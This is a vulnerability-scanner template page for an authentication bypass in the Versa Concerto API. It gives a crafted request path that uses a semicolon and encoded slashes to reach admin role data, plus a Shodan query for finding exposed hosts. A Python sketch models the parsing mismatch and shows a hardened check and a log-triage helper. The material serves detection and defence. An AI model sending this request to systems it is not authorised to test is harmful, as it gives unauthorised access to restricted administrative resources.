Versa Concerto API Path Based - Authentication Bypass
versa-concerto-api-auth-bypass
Verified
Description
Authentication bypass in the Versa Concerto API, caused by URL decoding inconsistencies. It allowed unauthorized access to certain API endpoints by manipulating the URL path. This issue enabled attackers to bypass authentication controls and access restricted resources.
Severity
Critical
Affected Product
concerto
Published Date
May 21, 2025
Template Author
iamnoooob, rootxharsh, parthmalhotra
versa-concerto-api-auth-bypass.yaml
id: versa-concerto-api-auth-bypass

info:
  name: Versa Concerto API Path Based - Authentication Bypass
  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
  severity: critical
  description: |
    Authentication bypass in the Versa Concerto API, caused by URL decoding inconsistencies. It allowed unauthorized access to certain API endpoints by manipulating the URL path.This issue enabled attackers to bypass authentication controls and access restricted resources.
  reference:
    - https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/
    - https://versa-networks.com/documents/datasheets/versa-concerto.pdf
  classification:
    cpe: cpe:2.3:a:versa-networks:concerto:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: versa-networks
    product: concerto
    max-request: 1
    shodan-query: http.favicon.hash:-534530225
  tags: versa,concerto,api,auth-bypass

http:
  - raw:
      - |
        GET /portalapi/v1/roles/option;%2fv1%2fping HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ENTERPRISE_ADMINISTRATOR

      - type: word
        part: header
        words:
          - EECP-CSRF-TOKEN
# digest: 4a0a00473045022100b0d5ca0d2bd8d42f8cf1bb277fcf3118e73bc5a3ea067e1d864fd1cefde8a8ea02201976f6c2fbe05cc28fe8814bc54b9996342089a320865c6692580316259e0212:922c64590222798bb761d5b6d8e72950
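The decoding inconsistency named in the description can be modelled as two components reading the same request path differently. The sketch below is an added example, not Concerto's code and not part of the template. It assumes a hypothetical auth filter that percent-decodes the raw path and exempts anything ending in `/v1/ping`, and a hypothetical router that drops `;parameters` before dispatch. It then shows a check that refuses to exempt ambiguous paths.

```python
import re
from urllib.parse import unquote

# Path taken from the request line in the template above.
SAMPLE_PATH = "/portalapi/v1/roles/option;%2fv1%2fping"
# Assumption: suffixes the filter treats as unauthenticated (hypothetical).
OPEN_SUFFIXES = ("/v1/ping",)
# Encoded '/', '\', ';' and '%' let two parsers disagree about a path.
_ENCODED_SEP = re.compile(r"%(2f|5c|3b|25)", re.IGNORECASE)


def filter_view(raw_path: str) -> str:
    """Hypothetical auth filter: percent-decodes the raw path, keeps ';params'."""
    return unquote(raw_path)


def router_view(raw_path: str) -> str:
    """Hypothetical router: drops ';params' from each segment, then decodes."""
    return "/".join(unquote(seg.split(";", 1)[0]) for seg in raw_path.split("/"))


def naive_skips_auth(raw_path: str) -> bool:
    """Weak check: the exemption is decided on the filter's view alone."""
    return filter_view(raw_path).endswith(OPEN_SUFFIXES)


def hardened_skips_auth(raw_path: str) -> bool:
    """Reject ambiguous paths, then decide on the path the router will serve."""
    if ";" in raw_path or _ENCODED_SEP.search(raw_path):
        return False  # never exempt a path that two parsers could read differently
    return router_view(raw_path).endswith(OPEN_SUFFIXES)


def views_disagree(raw_path: str) -> bool:
    """Triage helper for access logs: flags paths the two models parse differently."""
    return filter_view(raw_path) != router_view(raw_path)


if __name__ == "__main__":
    # Constructed sample paths: the template's request, a plain health check,
    # and the protected endpoint requested directly.
    for path in (SAMPLE_PATH, "/portalapi/v1/ping", "/portalapi/v1/roles/option"):
        print(f"{path!r}: routed_as={router_view(path)!r} "
              f"naive_exempt={naive_skips_auth(path)} "
              f"hardened_exempt={hardened_skips_auth(path)} "
              f"ambiguous={views_disagree(path)}")
```

The same `views_disagree` test can be run over logged request paths to find earlier requests of this shape.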